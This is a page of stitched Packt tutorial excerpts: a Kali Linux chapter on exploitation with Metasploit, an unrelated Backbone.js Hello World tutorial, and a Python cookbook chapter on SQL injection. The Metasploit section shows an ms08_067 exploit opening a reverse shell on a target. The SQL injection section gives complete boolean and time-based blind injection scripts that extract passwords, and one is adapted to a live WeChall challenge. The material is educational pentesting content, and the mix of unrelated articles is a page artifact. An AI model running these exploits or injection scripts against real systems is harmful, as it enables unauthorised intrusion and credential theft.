Migration to Spring Security 3 [Article]
Getting Started with Spring Security [Article]
So, what is Spring for Android? [Article]

Target Exploitation

Packt
14 Mar 2014
14 min read
(For more resources related to this topic, see here.)

Vulnerability research

Understanding the capabilities of a specific software or hardware product may provide a starting point for investigating vulnerabilities that could exist in that product. Conducting vulnerability research is not easy, nor is it a one-click task; it requires a strong knowledge base and several factors to carry out security analysis:

Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures of any programming language gives the tester a decisive advantage in finding vulnerabilities. Apart from basic knowledge of programming languages, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and caches. These concepts apply in almost any programming language, such as C/C++, Python, Perl, and assembly. To learn the basics of writing exploit code for a discovered vulnerability, please visit http://www.phreedom.org/presentations/exploit-code-development/.

Reverse engineering: This is another wide area for discovering vulnerabilities that could exist in an electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce code from a given system without any prior knowledge of its internal workings, to examine it for error conditions and poorly designed functions and protocols, and to test its boundary conditions. There are several motivations for practicing reverse engineering skills, such as the removal of copyright protection from software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring sensitive data. Reverse engineering adds two layers to examining the code of an application: source code auditing and binary auditing. If you have access to the application's source code, you can accomplish the security analysis through automated tools, or study the source manually in order to extract the conditions under which a vulnerability can be triggered. Binary auditing, on the other hand, covers reverse engineering where the application exists without any source code. Disassemblers and decompilers are two generic types of tools that may assist the auditor with binary analysis: disassemblers generate assembly code from a compiled binary program, while decompilers generate high-level language code from a compiled binary program. Dealing with either of these tools is quite challenging, however, and requires careful assessment.

Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage tools, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing purposes. Explaining each of these tool categories is out of the scope of this book; however, you may find several useful tools already present in Kali Linux. To keep track of the latest reverse code engineering tools, we strongly recommend that you visit the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools.

Exploitability and payload construction: This is the final step: writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of vulnerable applications from the reverse engineering stage and polish the shellcode with an encoding mechanism in order to avoid bad characters that might cause the exploit process to terminate. Depending on the type and classification of the vulnerability discovered, it is very important to follow the specific strategy that will allow you to execute arbitrary code or commands on the target system. As a professional penetration tester, you will always be looking for loopholes that result in shell access to the target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework, which will show these tools and techniques.

Vulnerability and exploit repositories

For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with PoC exploit code to prove the feasibility and viability of the vulnerability found in the specific software or application, and many still remain unaddressed. This competitive era of finding publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search for and retrieve the best available exploit that suits their target system environment. You can also port one type of exploit to another (for example, Win32 architecture to Linux architecture), provided that you hold intermediate programming skills and a clear understanding of the OS-specific architecture. We have provided a combined set of online repositories that may help you track down vulnerability information or exploits by searching through them.

Not every single vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories:

Bugtraq SecurityFocus: http://www.securityfocus.com
OSVDB Vulnerabilities: http://osvdb.org
Packet Storm: http://www.packetstormsecurity.org
VUPEN Security: http://www.vupen.com
National Vulnerability Database: http://nvd.nist.gov
ISS X-Force: http://xforce.iss.net
US-CERT Vulnerability Notes: http://www.kb.cert.org/vuls
US-CERT Alerts: http://www.us-cert.gov/cas/techalerts/
SecuriTeam: http://www.securiteam.com
Government Security Org: http://www.governmentsecurity.org
Secunia Advisories: http://secunia.com/advisories/historic/
Security Reason: http://securityreason.com
XSSed XSS-Vulnerabilities: http://www.xssed.com
Security Vulnerabilities Database: http://securityvulns.com
SEBUG: http://www.sebug.net
BugReport: http://www.bugreport.ir
MediaService Lab: http://lab.mediaservice.net
Intelligent Exploit Aggregation Network: http://www.intelligentexploit.com
Hack0wn: http://www.hack0wn.com

Although there are many other Internet resources available, we have listed only a few reviewed ones. Kali Linux comes with an integrated exploit database from Offensive Security, which provides the extra advantage of keeping an up-to-date archive of exploits on your system for future reference and use.
To access Exploit-DB, execute the following commands in your shell:

# cd /usr/share/exploitdb/
# vim files.csv

This will open a complete list of the exploits currently available from Exploit-DB. The exploit files themselves live under the /usr/share/exploitdb/platforms/ directory and are categorized into subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handy set of compilers and interpreters that support the execution of these exploits.

How do you extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file in order to retrieve meaningful data. You can either use searchsploit, or type cat files.csv | grep '"' | cut -d";" -f3 in your console; this will extract the list of exploit titles from the files.csv file. To learn basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html.

Advanced exploitation toolkit

Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We explain it in greater detail and present a number of scenarios that will increase your productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization, which makes it easy for a penetration tester with reasonable programming skills to extend it or develop custom plugins and tools. The architecture of the framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of the various interfaces and modules. Interfaces (console, CLI, web, and GUI) provide the front-end operational activity when dealing with any type of module (exploits, payloads, auxiliaries, encoders, and NOPs). Each of the following module types has its own meaning and is function-specific to the penetration testing process:

Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system.
Payload: This module is malicious code, intended as part of an exploit or compiled independently, that runs arbitrary commands on the target system.
Auxiliaries: These modules are a set of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks.
Encoders: These modules are provided to evade detection by antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation.
No Operation or No Operation Performed (NOP): This module is an assembly language instruction, often added to a shellcode, that does nothing but pad the payload to a consistent size.

For your understanding, we explain the basic use of two well-known Metasploit interfaces along with their relevant command-line options. Each interface has its own strengths and weaknesses; however, we strongly recommend that you stick to the console version, as it supports most of the framework's features.

MSFConsole

MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interfaces for penetration testers to make the best use of the exploitation framework.
To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework, or use the terminal to execute the following command:

# msfconsole

You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command:

msf > help

This will display two sets of commands; one set will be widely used across the framework, and the other will be specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved through the use of -h, following the core command. Let us examine the use of the show command as follows:

msf > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options
[*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display the available modules of a given type or all of the modules. The most frequently used commands could be any of the following:

show auxiliary: This command will display all the auxiliary modules.
show exploits: This command will get a list of all the exploits within the framework.
show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads. For instance, Windows payloads will only be displayed with the Windows-compatible exploits.
show encoders: This command will print the list of available encoders.
show nops: This command will display all the available NOP generators.
show options: This command will display the settings and options available for the specific module.
show targets: This command will help us to extract a list of target OS supported by a particular exploit module.
show advanced: This command will provide you with more options to fine-tune your exploit execution.

We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The italicized terms next to the commands will need to be provided by you:

check: To verify a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.
connect ip port: Works similar to that of Netcat and Telnet tools.
exploit: To launch a selected exploit.
run: To launch a selected auxiliary.
jobs: Lists all the background modules currently running and provides the ability to terminate them.
route add subnet netmask sessionid: To add a route for the traffic through a compromised session for network pivoting purposes.
info module: Displays detailed information about a particular module (exploit, auxiliary, and so on).
set param value: To configure the parameter value within a current module.
setg param value: To set the parameter value globally across the framework to be used by all exploits and auxiliary modules.
unset param: It is a reverse of the set command. You can also reset all variables by using the unset all command at once.
unsetg param: To unset one or more global variables.
sessions: Ability to display, interact, and terminate the target sessions. Use with -l for listing, -i ID for interaction, and -k ID for termination.
search string: Provides a search facility through module names and descriptions.
use module: Select a particular module in the context of penetration testing.
It is important for you to understand their basic use with different sets of modules within the framework.

MSFCLI

Similar to the MSFConsole interface, the command-line interface (CLI) provides extensive coverage of the various modules, which can be launched from a single command line. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command:

# msfcli -h

This will display all the available modes, similar to those of MSFConsole, as well as usage instructions for selecting a particular module and setting its parameters. Note that all the variables or parameters should follow the convention param=value and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:

# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The use of O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter and lists the compatible payloads (P):

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                             Description
   ----                             -----------
   generic/debug_trap               Generate a debug trap in the target process
   generic/shell_bind_tcp           Listen for a connection and spawn a command shell
...

Finally, after setting the target IP using the RHOST parameter, it is time to select a compatible payload and execute our exploit as follows:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for the chosen payload.
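Since we recommend the console interface above, it is worth noting that the same exercise can be driven interactively from msfconsole. The following is a minimal sketch of that workflow, reusing the module, payload, and IP addresses assumed in the msfcli example; the console banners and module output have been omitted:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > exploit

Here, show options plays the same role as the O flag in msfcli, and exploit corresponds to the E flag, while set (and setg) from the command table above replaces the param=value pairs.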

Building an app using Backbone.js

Packt
29 Jul 2013
7 min read
(For more resources related to this topic, see here.)

Building a Hello World app

For building the app you will need the necessary script files and a project directory laid out. Let's begin writing some code. This code requires all scripts to be accessible; otherwise we'll see some error messages. We'll also go over the Web Inspector and use it to interact with our application. Learning this tool is essential for any web application developer to proficiently debug (and even write new code for) their application.

Step 1 – adding code to the document

Add the following code to the index.html file. I'm assuming the use of LoDash and Zepto, so you'll want to update the code accordingly:

<!DOCTYPE HTML>
<html>
<head>
  <title>Backbone Application Development Starter</title>
  <!-- Your Utility Library -->
  <script src="scripts/lodash-1.3.1.js"></script>
  <!-- Your Selector Engine -->
  <script src="scripts/zepto-1.0.js"></script>
  <script src="scripts/backbone-1.0.0.js"></script>
</head>
<body>
  <div id="display">
    <div class="listing">Houston, we have a problem.</div>
  </div>
</body>
<script src="scripts/main.js"></script>
</html>

This file will load all of our scripts and has a simple <div>, which displays some content. I have placed the loading of our main.js file after the closing <body> tag. This is just a personal preference of mine; it ensures that the script is executed after the elements of the DOM have been populated. If you were to place it adjacent to the other scripts, you would need to encapsulate the contents of the script with a function call so that it gets run after the DOM has loaded; otherwise, when the script runs and tries to find the div#display element, it will fail.

Step 2 – adding code to the main script

Now, add the following code to your scripts/main.js file:

var object = {};
_.extend(object, Backbone.Events);
object.on("show-message", function(msg) {
  $('#display .listing').text(msg);
});
object.trigger("show-message", "Hello World");

Allow me to break down the contents of main.js so that you know what each line does.

var object = {};

The preceding line should be pretty obvious. We're just creating a new object, aptly named object, which contains no attributes.

_.extend(object, Backbone.Events);

The preceding line is where the magic starts to happen. The utility library provides us with many functions, one of which is extend. This function takes two or more objects as its arguments, copies the attributes from the later objects, and appends them to the first object. You can think of this as sort of extending a class in a classical language (such as PHP). Using the extend utility function is the preferred way of adding Backbone functionality to your classes. In this case, our object is now a Backbone event object, which means it can be used for triggering events and running callback functions when an event is triggered. By extending your objects in this manner, you have a common method for performing event-based actions in your code, without having to write one-off implementations.

object.on("show-message", function(msg) {
  $('#display .listing').text(msg);
});

The preceding code adds an event listener to our object. The first argument to the on function is the name of the event, in this case show-message. This is a simple string that describes the event you are listening for and will be used later for triggering the event. There isn't a requirement as far as naming conventions go, but try to be descriptive and consistent. The second argument is a callback function, which takes an argument that can be set at the time the event is triggered. The callback function here is pretty simple; it just queries the DOM using our selector engine and updates the text of the element to be the text passed into the event.

object.trigger("show-message", "Hello World");

Finally, we trigger our event. Simply use the trigger function on the object, tell it that we are triggering the show-message event, and pass in the argument for the trigger callback as the second argument.

Step 3 – opening the project in your browser

This will show us the text Hello World when we open our index.html file in our browser. Don't believe me? Double click on the file now, and you should see the following screen:

If Chrome isn't your default browser, you should be able to right-click on the file from within your file browser and choose which application to open the file with. Chrome should be in that list if it was installed properly.

Step 4 – encountering a problem

Do you see something other than our happy Hello World message? The code is set up in a way that it displays the message Houston, we have a problem if something goes wrong (this text is what is displayed in the DOM by default, before JavaScript runs and replaces it).

The missing script file

The first place to look for the problem is the Network tab of the Web Inspector. This tab shows us each of the files that were downloaded by the browser to satisfy the rendering of the page. Sometimes, the Console tab will also tell us when a file wasn't properly downloaded, but not always. The following screenshot explains this:

If you look at the Network tab, you can see an item clearly marked in red (backbone-1.0.0.js). In my project folder, I had forgotten to download the Backbone library file, thus the browser wasn't able to load the file. Note that we are loading the file from the local filesystem, so the status column says either Success or Failure. If these files were being loaded from a real web server, you would see the actual HTTP status codes, such as 200 OK for a successful file download or 404 Not Found for a missing file.

The script typo

Perhaps you have made a typo in the script while copying it from the book. If you have any sort of issues resulting from incorrect JavaScript, they will be visible in the Console tab, as shown in the following screenshot:

In my example, I had forgotten the line about extending my object with the Backbone events class. Having left out the extend line of code caused the object to be missing some functionality, specifically the method on(). Notice how the console displays the filename and line number the error is on. Feel free to remove and add code to the files and refresh the page to get a feel for what the errors look like in the console. This is a great way to get a feel for debugging Backbone-based (and, really, any JavaScript) applications.

Summary

In this article we learned how to develop an app using Backbone.js.

Resources for Article:

Further resources on this subject:
JBoss Portals and AJAX - Part 1 [Article]
Getting Started with Zombie.js [Article]
DWR Java AJAX User Interface: Basic Elements (Part 1) [Article]

SQL Injection

Packt
23 Jun 2015
11 min read
In this article by Cameron Buchanan, Terry Ip, Andrew Mabbitt, Benjamin May, and Dave Mound, authors of the book Python Web Penetration Testing Cookbook, we're going to create scripts that encode attack strings, perform attacks, and time normal actions in order to normalize attack times.

(For more resources related to this topic, see here.)

Exploiting Boolean SQLi

There are times when all you can get from a page is a yes or no. It's heartbreaking until you realise that that's the SQL equivalent of saying "I LOVE YOU". All SQLi can be broken down into yes or no questions, dependent on how patient you are. We will create a script that takes a yes value and a URL, and returns results based on a predefined attack string. I have provided an example attack string, but this will change depending on the system you are testing.

How to do it…

The following script is how yours should look (note that the original listing contained a few syntax slips, such as a missing comma in the requests.post call and an off-by-one in the character loop, which have been corrected here):

import requests
import sys

yes = sys.argv[1]

i = 1
asciivalue = 1

answer = []
print "Kicking off the attempt"

while True:
    payload = {'injection': '\' AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)
    lengthtest = req.text
    if yes in lengthtest:
        length = i
        break
    else:
        i = i+1

for x in range(1, length+1):
    while asciivalue < 126:
        payload = {'injection': '\' AND (substr(password, '+str(x)+', 1)) = \''+chr(asciivalue)+'\';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)
        if yes in req.text:
            answer.append(chr(asciivalue))
            break
        else:
            asciivalue = asciivalue + 1
            pass
    asciivalue = 1

print "Recovered String: " + ''.join(answer)

How it works…

Firstly, the user must identify a string that only occurs when the SQLi is successful. Alternatively, the script may be altered to respond to the absence of proof of a failed SQLi. We provide this string as a sys.argv. We also create the two iterators we will use in this script and set them to 1, as MySQL starts counting from 1 instead of 0 like the failed system it is. We also create an empty list for our future answer and tell the user the script is starting.

yes = sys.argv[1]

i = 1
asciivalue = 1
answer = []
print "Kicking off the attempt"

Our payload basically requests the length of the password we are attempting to return and compares it to a value that will be iterated:

payload = {'injection': '\' AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}

We then repeat the next loop forever, as we have no idea how long the password is. Each time around, we rebuild the payload with the current value of i and submit it to the target URL in a POST request:

while True:
    payload = {'injection': '\' AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload)

Each time, we check to see if the yes value we set originally is present in the response text and, if so, we end the while loop, setting the current value of i as the parameter length. The break command is the part that ends the while loop:

lengthtest = req.text
if yes in lengthtest:
    length = i
    break

If we don't detect the yes value, we add one to i and continue the loop:

else:
    i = i+1

Using the identified length of the target string, we iterate through each character position and, using the ascii value, each possible value of that character. For each value, we submit it to the target URL. Because the ascii table of printable characters only runs up to 127, we cap the loop to run until the ascii value has reached 126. If it reaches 127, something has gone wrong:

for x in range(1, length+1):
    while asciivalue < 126:
        payload = {'injection': '\' AND (substr(password, '+str(x)+', 1)) = \''+chr(asciivalue)+'\';#', 'Submit': 'submit'}
        req = requests.post('<target url>', data=payload)

We check to see if our yes string is present in the response and, if so, break to go on to the next character. We append the successful value to our answer list in character form, converting it with the chr command:

if yes in req.text:
    answer.append(chr(asciivalue))
    break

If the yes value is not present, we add to the ascii value to move on to the next potential character for that position and pass:

else:
    asciivalue = asciivalue + 1
    pass

Finally, we reset the ascii value for each loop and, when the loop hits the length of the string, we finish, printing the whole recovered string:

asciivalue = 1
print "Recovered String: " + ''.join(answer)

There's more…

This script could potentially be altered to iterate through tables and recover multiple values through better-crafted SQL injection strings. Ultimately, this provides a base plate, as with the later Blind SQL Injection script, for developing more complicated and impressive scripts to handle challenging tasks. See the Blind SQL Injection script for an advanced implementation of these concepts.

Exploiting Blind SQL Injection

Sometimes life hands you lemons; Blind SQL Injection points are some of those lemons. You're reasonably sure you've found an SQL injection vulnerability, but there are no errors and you can't get it to return any data. In these situations you can use timing commands within SQL to make the page pause before returning a response, and then use that timing to make judgements about the database and its data. We will create a script that makes requests to the server and receives differently timed responses depending on the characters it's requesting. It will then read those times and reassemble strings.

How to do it…

The script is as follows (again, a missing comma and the misuse of elapsed.total_seconds in the original listing have been corrected so that the code runs):

import requests

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

payload = {'injection': '\' or sleep(char_length(password));#', 'Submit': 'submit'}
req = requests.post('<target url>', data=payload, cookies=cookies)
firstresponsetime = int(req.elapsed.total_seconds())

for x in range(1, firstresponsetime+1):
    payload = {'injection': '\' or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}
    req = requests.post('<target url>', data=payload, cookies=cookies)
    responsetime = int(req.elapsed.total_seconds())
    a = chr(responsetime)
    times.append(a)
    answer = ''.join(times)

print "Recovered String: " + answer

How it works…

As ever, we import the required libraries and declare the list we need to fill later on. We also print a message stating that the script has indeed started; with some time-based functions, the user can be left waiting a while. In this script I have also included cookies using the requests library, as it is likely that this sort of attack will require authentication:

times = []
print "Kicking off the attempt"
cookies = {'cookie name': 'Cookie value'}

We set our payload up in a dictionary along with a submit button. The attack string is simple enough to understand with a little explanation. The initial tick has to be escaped to be treated as text within the dictionary. That tick closes the original SQL statement and allows us to input our own SQL commands. Next, we say that in the event of the first command failing, the following command should be performed with OR. We then tell the server to sleep one second for every character in the first row of the password column. Finally, we close the statement with a semicolon and comment out any trailing characters with a hash (or pound if you're American and/or wrong):

payload = {'injection': '\' or sleep(char_length(password));#', 'Submit': 'submit'}

We then record the length of time the server took to respond as the firstresponsetime parameter. We will use this to understand how many characters we need to brute-force through this method in the following chain:

firstresponsetime = int(req.elapsed.total_seconds())

We create a loop that sets x to every number from 1 to the length of the string identified, and performs an action for each one. We start from 1 here because MySQL starts counting from 1, rather than from zero like Python:

for x in range(1, firstresponsetime+1):

We make a similar payload to before, but this time we are saying sleep for the ascii value of character X of the password in the password column, row one. So if the first character were a lowercase a, the corresponding ascii value is 97 and the system would sleep for 97 seconds; if it were a lowercase b, it would sleep for 98 seconds, and so on:

payload = {'injection': '\' or sleep(ord(substr(password, '+str(x)+', 1)));#', 'Submit': 'submit'}

We submit our data once for each character position in the string:

req = requests.post('<target url>', data=payload, cookies=cookies)

We take the response time from each request to record how long the server slept, and then convert that time back from an ascii value into a letter:

responsetime = int(req.elapsed.total_seconds())
a = chr(responsetime)

For each iteration we build up the password as it is currently known, and eventually print out the full password:

answer = ''.join(times)
print "Recovered String: " + answer

There's more…

This script provides a framework that can be adapted to many different scenarios. Wechall, the web app challenge website, sets a time-limited blind SQLi challenge that has to be completed in a very short time period. The following is our original script adapted to this environment. As you can see, I've had to account for smaller time differences between values and for server lag, and I've also incorporated a checking method to reset the testing value each time and submit it automatically:

import subprocess
import requests

def round_down(num, divisor):
    return num - (num%divisor)

subprocess.Popen(["modprobe pcspkr"], shell=True)
subprocess.Popen(["beep"], shell=True)

values = {'0': '0', '25': '1', '50': '2', '75': '3', '100': '4', '125': '5', '150': '6', '175': '7', '200': '8', '225': '9', '250': 'A', '275': 'B', '300': 'C', '325': 'D', '350': 'E', '375': 'F'}
times = []
answer = "This is the first time"
cookies = {'wc': 'cookie'}
setup = requests.get('http://www.wechall.net/challenge/blind_lighter/index.php?mo=WeChall&me=Sidebar2&rightpanel=0', cookies=cookies)
y = 0
accum = 0

while 1:
    reset = requests.get('http://www.wechall.net/challenge/blind_lighter/index.php?reset=me', cookies=cookies)
    for line in reset.text.splitlines():
        if "last hash" in line:
            print "the old hash was:"+line.split(" ")[20].strip(".</li>")
            print "the guessed hash:"+answer
            print "Attempts reset \n\n"
    for x in range(1, 33):
        payload = {'injection': '\' or IF (ord(substr(password, '+str(x)+', 1)) BETWEEN 48 AND 57,sleep((ord(substr(password, '+str(x)+', 1))-48)/4),sleep((ord(substr(password, '+str(x)+', 1))-55)/4));#', 'inject': 'Inject'}
        req = requests.post('http://www.wechall.net/challenge/blind_lighter/index.php?ajax=1', data=payload, cookies=cookies)
        responsetime = str(req.elapsed)[5]+str(req.elapsed)[6]+str(req.elapsed)[8]+str(req.elapsed)[9]
        accum = accum + int(responsetime)
        benchmark = int(15)
        benchmarked = int(responsetime) - benchmark
        rounded = str(round_down(benchmarked, 25))
        if rounded in values:
            a = str(values[rounded])
            times.append(a)
            answer = ''.join(times)
        else:
            print rounded
            rounded = str("375")
            a = str(values[rounded])
            times.append(a)
            answer = ''.join(times)
    submission = {'thehash': str(answer), 'mybutton': 'Enter'}
    submit = requests.post('http://www.wechall.net/challenge/blind_lighter/index.php', data=submission, cookies=cookies)
    print "Attempt: "+str(y)
    print "Time taken: "+str(accum)
    y += 1
    for line in submit.text.splitlines():
        if "slow" in line:
            print line.strip("<li>")
        elif "wrong" in line:
            print line.strip("<li>")
    if "wrong" not in submit.text:
        print "possible success!"
        #subprocess.Popen(["beep"], shell=True)

Summary

We looked at how to recover strings through two different attacks: Boolean SQL injection and blind (time-based) SQL injection. You will find various other kinds of attacks throughout the book.

Resources for Article:

Further resources on this subject:
Pentesting Using Python [article]
Wireless and Mobile Hacks [article]
Introduction to the Nmap Scripting Engine [article]